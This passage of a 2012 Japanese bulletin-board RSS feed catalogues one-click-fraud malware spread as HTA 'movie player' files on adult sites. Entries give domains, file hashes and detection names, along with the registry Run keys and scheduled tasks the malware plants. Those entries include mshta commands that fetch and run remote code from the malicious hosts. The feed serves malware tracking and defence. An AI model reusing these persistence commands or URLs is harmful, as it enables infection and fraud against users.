C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [UmlModblPhotoScriot] &quot;C:\Users\Creberus\AppData\Roaming\Adobe\PhotoScriot.lnk&quot; O4 - HKCU\..\Run: [Neptsne31538_225019911] &quot;C:\Windows\system32\mshta&quot; <a href="http://211a.fieldset.info/qgam4d3a/fOYTzFKelButGqJjBUjiVw.htm" target="_blank">http://211a.fieldset.info/qgam4d3a/fOYTzFKelButGqJjBUjiVw.htm</a>  以下略 ----------------------------------------------------------  <a href="http://gtr.fasteasy.biz/" target="_blank">http://gtr.fasteasy.biz/</a> <a href="http://" target="_blank">http://</a>*.fasteasy.biz/   File name 「MoviePlayer.hta」  <a href="https://www.virustotal.com/file/9954bc178415081e86d1a8cd739c8d5c3f81a6459dbfbf734f1d2c25cf816900/analysis/1331449240/" target="_blank">https://www.virustotal.com/file/9954bc178415081e86d1a8cd739c8d5c3f81a6459dbfbf734f1d2c25cf816900/analysis/1331449240/</a>    C:\Users\Creberus\AppData\Roaming\Adobe\WscMgr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [RominopocketWmFi] &quot;C:\Users\Creberus\AppData\Roaming\Macromedia\pocketWmFi.lnk&quot; O4 - HKCU\..\Run: [Neptsne31538_225019911] &quot;C:\Windows\system32\mshta&quot; <a href="http://6c7b.fieldset.info/sa/XR5TsmZ1iLmD84w6qwwjXw.htm" target="_blank">http://6c7b.fieldset.info/sa/XR5TsmZ1iLmD84w6qwwjXw.htm</a> 以下略 --------------------------------------------------------- <a href="http://kxu.entergate.biz/" target="_blank">http://kxu.entergate.biz/</a>  <a href="http://8sh.entergate.biz/" target="_blank">http://8sh.entergate.biz/</a>  <a href="http://" target="_blank">http://</a>*.entergate.biz/   File name 「FlvMovie.hta」   Kaspersky　　Trojan-Downloader.HTA.Agent.cv　　20120314 <a href="https://www.virustotal.com/file/07a01f62d2c48a5d624404be9e5ddadbdc753ab8b2ae5614ef4e8a5f33aec0de/analysis/1331730394/" target="_blank">https://www.virustotal.com/file/07a01f62d2c48a5d624404be9e5ddadbdc753ab8b2ae5614ef4e8a5f33aec0de/analysis/1331730394/</a>  C:\Users\Creberus\AppData\Roaming\Adobe\WscMgr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [MetaIrameQhdQcb] &quot;C:\Users\Creberus\AppData\Roaming\Lunascape\QhdQcb.lnk&quot; O4 - HKCU\..\Run: [Neptsne31538_268966609] &quot;C:\Windows\system32\mshta&quot; <a href="http://9bf3.entergate.biz/sob6/uCBa78q14QSE1KZCL0QbsA.htm" target="_blank">http://9bf3.entergate.biz/sob6/uCBa78q14QSE1KZCL0QbsA.htm</a> 以下略 ----------------------------------------------------------- <a href="http://vjc.nakedplugin.info/" target="_blank">http://vjc.nakedplugin.info/</a> <a href="http://a2e.nakedplugin.info/" target="_blank">http://a2e.nakedplugin.info/</a> <a href="http://" target="_blank">http://</a>*.nakedplugin.info/    File name 「FlashMoviePlayer.hta」   <a href="https://www.virustotal.com/file/3f439853e111ce9572166e658ab6c950709c849dc946d414f66e1f5c39a72833/analysis/1331811056/" target="_blank">https://www.virustotal.com/file/3f439853e111ce9572166e658ab6c950709c849dc946d414f66e1f5c39a72833/analysis/1331811056/</a>  C:\Documents and Settings\ねこ王\Application Data\Identities\wmMsgSvr.exe C:\WINDOWS\system32\mshta.exe  O4 - HKCU\..\Run: [QuadCorv(Mozijla)] &quot;C:\Documents and Settings\ねこ王\Application Data\Adobe\Mozijla&quot; O4 - HKCU\..\Run: [ncptune28454_441696208] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://f053.nakedplugin.info/pap/aLS-oiC9gZARTIz5784itA.htm" target="_blank">http://f053.nakedplugin.info/pap/aLS-oiC9gZARTIz5784itA.htm</a> 以下略 ---------------------------------------------------------  <a href="http://0ec.smallhungry.com/" target="_blank">http://0ec.smallhungry.com/</a> <a href="http://1g8.smallhungry.com/" target="_blank">http://1g8.smallhungry.com/</a> <a href="http://h3h.smallhungry.com/" target="_blank">http://h3h.smallhungry.com/</a> <a href="http://" target="_blank">http://</a>*.smallhungry.com/  File name 「FlvMovie.hta」   <a href="https://www.virustotal.com/file/4e2d70fa54542a7f4506697bd1eb39ec06e9e4aa30930a24a4c760ed3cc96711/analysis/1331981374/" target="_blank">https://www.virustotal.com/file/4e2d70fa54542a7f4506697bd1eb39ec06e9e4aa30930a24a4c760ed3cc96711/analysis/1331981374/</a>   C:\Users\Creberus\AppData\Roaming\Macromedia\WscMgr.exe C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [PeerCasb(Camullia)] &quot;C:\Users\Creberus\AppData\Roaming\Identities\Camullia.lnk&quot; O4 - HKCU\..\Run: [Neptsne31538_268966609] &quot;C:\Windows\system32\mshta&quot; <a href="http://dd4e.entergate.biz/acthb7/hWsgIl-8FOKjmXUC4xtxEQ.htm" target="_blank">http://dd4e.entergate.biz/acthb7/hWsgIl-8FOKjmXUC4xtxEQ.htm</a>  以下略              </description>
  <dc:date>2012-03-07T20:13+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>ADULT COLLECTION</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://www.aosuziageha-movie.net/" target="_blank">http://www.aosuziageha-movie.net/</a>  File name 「6f55.hta」 <a href="https://www.virustotal.com/file/f2fc49356aa86ccfbdbef57831b4e3607c95438738890f88f7484a6013be3d83/analysis/1330227686/" target="_blank">https://www.virustotal.com/file/f2fc49356aa86ccfbdbef57831b4e3607c95438738890f88f7484a6013be3d83/analysis/1330227686/</a>   C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.aosuziageha-movie.net/regist2.php" target="_blank">http://www.aosuziageha-movie.net/regist2.php</a>  Startup on Registory HKCU:Run www.adult-collection09.net mshta <a href="http://www.aosuziageha-movie.net/regist2.php" target="_blank">http://www.aosuziageha-movie.net/regist2.php</a>  -----------------------------------------------------------  <a href="http://www.itimonzicyou-movie.org/" target="_blank">http://www.itimonzicyou-movie.org/</a>  File name 「5d94.hta」  Kaspersky  Trojan-Downloader.HTA.Agent.bu  20120305 <a href="https://www.virustotal.com/file/f485937e822f20e450008d302670a67e1e0a331a65f74ecd2f547168b63704d2/analysis/1330946588/" target="_blank">https://www.virustotal.com/file/f485937e822f20e450008d302670a67e1e0a331a65f74ecd2f547168b63704d2/analysis/1330946588/</a>    C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.itimonzicyou-movie.org/regist2.php" target="_blank">http://www.itimonzicyou-movie.org/regist2.php</a>   Startup on Registory  HKCU:Run www.adult-collection09.net mshta <a href="http://www.itimonzicyou-movie.org/regist2.php" target="_blank">http://www.itimonzicyou-movie.org/regist2.php</a>        </description>
  <dc:date>2012-02-26T15:35+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>Japanese Movies</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://gohng.info/" target="_blank">http://gohng.info/</a>    File name 「MovieID_Qf0cZrUoC4xsUHXOdJCqs2BTloRth4iA_vmw.EI_noisreV.hta」  <a href="https://www.virustotal.com/file/2e0a6a10e042ddc6ac1c747cc6e1bfd7814ba80964c328cc68930e8f06a781f5/analysis/1328350653/" target="_blank">https://www.virustotal.com/file/2e0a6a10e042ddc6ac1c747cc6e1bfd7814ba80964c328cc68930e8f06a781f5/analysis/1328350653/</a>   C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - HKCU\..\RunOnce: [RegWriteSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv] C:\Users\Cerberus\SoftRecovery\datSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe   The link place of &quot;RegWrite&quot;   C:\Windows\System32\mshta.exe <a href="http://gohng.info/set_inf2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv" target="_blank">http://gohng.info/set_inf2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv</a>   The link place of &quot;SystemBoot&quot;   C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://gohng.info/reg2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv&amp;log=1" target="_blank">http://gohng.info/reg2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv&amp;log=1</a>  Startup on Registory HKCU:Run RegWriteSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv C:\Users\Cerberus\SoftRecovery\RegWrite.lnk  HKCU:Run SystemBootSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv C:\Users\Cerberus\UserProfile\SystemBoot.lnk KCU:RunOnce RegWriteSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv C:\Users\Cerberus\SoftRecovery\datSr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv.bat Startup User RegWrite.lnk C:\Windows\System32\mshta.exe   Task Scheduler library  RegWrite  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://gohng.info/set_inf2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv&lt;/Arguments&gt;" target="_blank">http://gohng.info/set_inf2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv&lt;/Arguments&gt;</a>   SystemBoot  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://gohng.info/reg2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv&lt;/Arguments&gt;" target="_blank">http://gohng.info/reg2.php?cccid=Sr7ThBnnoyLeWJcbWBCSF7fHGFljgBMv&lt;/Arguments&gt;</a>   --------------------------------------------------------  <a href="http://bkoueb.info/" target="_blank">http://bkoueb.info/</a>   File name 「 MovieID_IHU927oSVuYzokXslTUa1POFfoJdJ7Id_vmw.EI_noisreV.hta」 <a href="https://www.virustotal.com/file/fb9b445ea057b7da0fef17f4ced7bf9a7cbab964b70d4aebebaf85a0ba6e8901/analysis/1328701905/" target="_blank">https://www.virustotal.com/file/fb9b445ea057b7da0fef17f4ced7bf9a7cbab964b70d4aebebaf85a0ba6e8901/analysis/1328701905/</a>   C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [SystemBootVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - HKCU\..\RunOnce: [RegWriteVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O] C:\Users\Cerberus\SoftRecovery\datVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWrite&quot;  C:\Windows\System32\mshta.exe <a href="http://bkoueb.info/set_inf2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O" target="_blank">http://bkoueb.info/set_inf2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O</a>   The link place of &quot;SystemBoot&quot;  C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://bkoueb.info/reg2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O&amp;log=1" target="_blank">http://bkoueb.info/reg2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O&amp;log=1</a>   Startup on Registory  HKCU:Run RegWriteVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:RunOnce RegWriteVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O C:\Users\Cerberus\SoftRecovery\datVYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O.bat  Startup User RegWrite.lnk C:\Windows\System32\mshta.exe  Task Scheduler library　  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://bkoueb.info/set_inf2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O&lt;/Arguments&gt;" target="_blank">http://bkoueb.info/set_inf2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O&lt;/Arguments&gt;</a>     &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://bkoueb.info/reg2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O&lt;/Arguments&gt;" target="_blank">http://bkoueb.info/reg2.php?cccid=VYOOmRkYff4tlRnpLFM35ozQ2v0BPN0O&lt;/Arguments&gt;</a>  　 ---------------------------------------------------------  <a href="http://cernkc.info/" target="_blank">http://cernkc.info/</a> <a href="http://d8ni1d.info/" target="_blank">http://d8ni1d.info/</a>  File name 「MovieID_EG9wLZt1PB5uwOtH38Fnn1kPAPvmtZoW_vmw.EI_noisreV.hta」  <a href="https://www.virustotal.com/file/d0e1b476a7df82a5353e6bdcdb3c3206e21de4cd687faec2b60455b18d948c66/analysis/1329003562/" target="_blank">https://www.virustotal.com/file/d0e1b476a7df82a5353e6bdcdb3c3206e21de4cd687faec2b60455b18d948c66/analysis/1329003562/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootEG9wLZt1PB5uwOtH38Fnn1kPAPvmtZoW] C:\Users\Creberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteEG9wLZt1PB5uwOtH38Fnn1kPAPvmtZoW] C:\Users\Creberus\SoftRecovery\RegWrite.lnk O4 - HKCU\..\RunOnce: [RegWriteEG9wLZt1PB5uwOtH38Fnn1kPAPvmtZoW] C:\Users\Creberus\SoftRecovery\datEG9wLZt1PB5uwOtH38Fnn1kPAPvmtZoW.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  以下略                    </description>
  <dc:date>2012-02-10T22:35+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title> EROSTAR </title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://qn515q.info/" target="_blank">http://qn515q.info/</a>    File name 「 MovieID_diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.hta」  <a href="https://www.virustotal.com/file/544a64fe6cec8c723b3c48090b97a156e9f161f1a01b68bd380a315055d4cb8f/analysis/1327915764/" target="_blank">https://www.virustotal.com/file/544a64fe6cec8c723b3c48090b97a156e9f161f1a01b68bd380a315055d4cb8f/analysis/1327915764/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [SystemBootdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWritediHvYDyYQRvrDubXyHsSW4gHdc0xQYi2] C:\Users\Cerberus\SoftRecovery\datdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.bat O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWriting&quot;   C:\Windows\System32\mshta.exe <a href="http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2" target="_blank">http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2</a>  The link place of &quot;SystemFile&quot; C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&amp;log=1" target="_blank">http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&amp;log=1</a>   Startup on Registory HKCU:Run RegWritediHvYDyYQRvrDubXyHsSW4gHdc0xQYi2 C:\Users\Cerberus\SoftRecovery\datdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.bat SystemBootdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2 C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe  Task Scheduler librar」 RegWriting &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;" target="_blank">http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;</a>    SystemFile &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;" target="_blank">http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;</a>   ----------------------------------------------------------  <a href="http://rrinl58r.info/" target="_blank">http://rrinl58r.info/</a>   File name 「MovieID_6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.hta」  <a href="https://www.virustotal.com/file/abea9c586fc93148dc75b5fdffadfca55e0b18d11615a72b1e926dc54f3b4a2f/analysis/1328011779/" target="_blank">https://www.virustotal.com/file/abea9c586fc93148dc75b5fdffadfca55e0b18d11615a72b1e926dc54f3b4a2f/analysis/1328011779/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [SystemBoot6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWrite6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo] C:\Users\Cerberus\SoftRecovery\dat6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.bat O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe   The link place of &quot;RegWriting&quot;   C:\Windows\System32\mshta.exe <a href="http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo" target="_blank">http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo</a>    The link place of &quot;SystemFile&quot;   C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&amp;log=1" target="_blank">http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&amp;log=1</a>   Startup on Registory HKCU:Run RegWrite6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo C:\Users\Cerberus\SoftRecovery\dat6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.bat HKCU:Run SystemBoot6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo C:\Users\Cerberus\UserProfile\SystemFile.lnk  Startup User RegWriting.lnk C:\Windows\System32\mshta.exe    Task Scheduler library　  RegWriting &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;" target="_blank">http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;</a>     SystemFile  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;" target="_blank">http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;</a>            </description>
  <dc:date>2012-01-30T21:58+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>Japanese Movies</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://bzin85b.info/" target="_blank">http://bzin85b.info/</a>  File name 「MovieID_JQwv8ppT2HNiZiFZQb8oWOMyHG6wrjfk.hta」 <a href="https://www.virustotal.com/file/f5518919afe6d8743a12667b9e3e79d464f301f464e2f0a8cad18e257e327f94/analysis/1327219800/" target="_blank">https://www.virustotal.com/file/f5518919afe6d8743a12667b9e3e79d464f301f464e2f0a8cad18e257e327f94/analysis/1327219800/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC] C:\Users\Cerberus\SoftRecovery\datSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWrite&quot;   C:\Windows\System32\mshta.exe <a href="http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC" target="_blank">http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC</a>   The link place of &quot;SystemBoot&quot;  C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&amp;log=1" target="_blank">http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&amp;log=1</a>   Startup on Registory  HKCU:Run RegWriteSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC C:\Users\Cerberus\SoftRecovery\datSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC.bat HKCU:Run SystemBootSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe  Task Scheduler library RegWrite  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;" target="_blank">http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;</a>  Task Scheduler library SystemBoot  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;" target="_blank">http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;</a>   ----------------------------------------------------------  <a href="http://ink59di.info/" target="_blank">http://ink59di.info/</a>  File name 「MovieID_kNZwPodBZ1pFSGnptoiDF7qMVj2DMUpz.hta」  <a href="https://www.virustotal.com/file/daafa3bc00d1e1b2f4d7f2a0fe659ac1aca4d45f087a36f0e230fcb82ce711b2/analysis/1327320142/" target="_blank">https://www.virustotal.com/file/daafa3bc00d1e1b2f4d7f2a0fe659ac1aca4d45f087a36f0e230fcb82ce711b2/analysis/1327320142/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [SystemBootzeb7zjtYnCMSZEU2mfdWr2513angqCQW] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWritezeb7zjtYnCMSZEU2mfdWr2513angqCQW] C:\Users\Cerberus\SoftRecovery\datzeb7zjtYnCMSZEU2mfdWr2513angqCQW.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe   The link place of &quot;RegWrite&quot;   C:\Windows\System32\mshta.exe <a href="http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW" target="_blank">http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW</a>  The link place of &quot;SystemBoot&quot;   C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&amp;log=1" target="_blank">http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&amp;log=1</a>   Startup on Registory   HKCU:Run RegWritezeb7zjtYnCMSZEU2mfdWr2513angqCQW C:\Users\Cerberus\SoftRecovery\datzeb7zjtYnCMSZEU2mfdWr2513angqCQW.bat HKCU:Run SystemBootzeb7zjtYnCMSZEU2mfdWr2513angqCQW C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe   Task Scheduler library RegWrite  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;" target="_blank">http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;</a>   SystemBoot  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;  &lt;Arguments&gt;<a href="http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;" target="_blank">http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;</a>                    </description>
  <dc:date>2012-01-22T20:49+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>セックス動画EROS </title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://ero-xx.com/" target="_blank">http://ero-xx.com/</a> File name 「movie_load1326801154.hta」  <a href="http://r.virscan.org/report/305a26e3e9b7e959049df99042d7e8b5.html" target="_blank">http://r.virscan.org/report/305a26e3e9b7e959049df99042d7e8b5.html</a>   C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe  C:\WINDOWS\system32\mshta.exe  O4 - HKCU\..\Run: [WqbLogic radiuy] &quot;C:\Users\Cerberus\AppData\Roaming\Adobe\radiuy.lnk&quot; O4 - HKCU\..\Run: [granite] C:\WINDOWS\system32\mshta.exe &quot;C:\Documents and Settings\Cerberus\Application Data\granite\granite.hta&quot;    The link place of &quot;radiuy&quot;  &quot;C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe&quot; //B //E:VBScript.Encode &quot;C:\Users\Cerberus\AppData\Roaming\Adobe\ChalcedonyeKsD&quot;   Startup on Registory   HKCU:Run granite C:\WINDOWS\system32\mshta.exe &quot;C:\Documents and Settings\Cerberus\Application Data\granite\granite.hta&quot; HKCU:Run WqbLogic radiuy &quot;C:\Users\Cerberus\AppData\Roaming\Adobe\radiuy.lnk&quot;   </description>
  <dc:date>2012-01-17T21:50+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>WMV</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://virtuoso.nebulanikki.net/" target="_blank">http://virtuoso.nebulanikki.net/</a> <a href="http://nebulanikki.net/" target="_blank">http://nebulanikki.net/</a> <a href="http://" target="_blank">http://</a>*.nebulanikki.net/  File name 「candygirl_1325973169.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=5f7846dad30c10f9a9ee8b555307aa48ac999152468bf6c562d575a8dd6c2a49-1325972821" target="_blank">http://www.virustotal.com/file-scan/report.html?id=5f7846dad30c10f9a9ee8b555307aa48ac999152468bf6c562d575a8dd6c2a49-1325972821</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d] C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs  Startup on Registory HKCU:Run breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs  Task Scheduler library &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs&lt;/Command&gt;  ---------------------------------------------------------  <a href="http://upheld.yorkshirejulie.net/" target="_blank">http://upheld.yorkshirejulie.net/</a> <a href="http://yorkshirejulie.net/" target="_blank">http://yorkshirejulie.net/</a> <a href="http://" target="_blank">http://</a>*.yorkshirejulie.net/   File name 「smsister_1326370947.hta」  <a 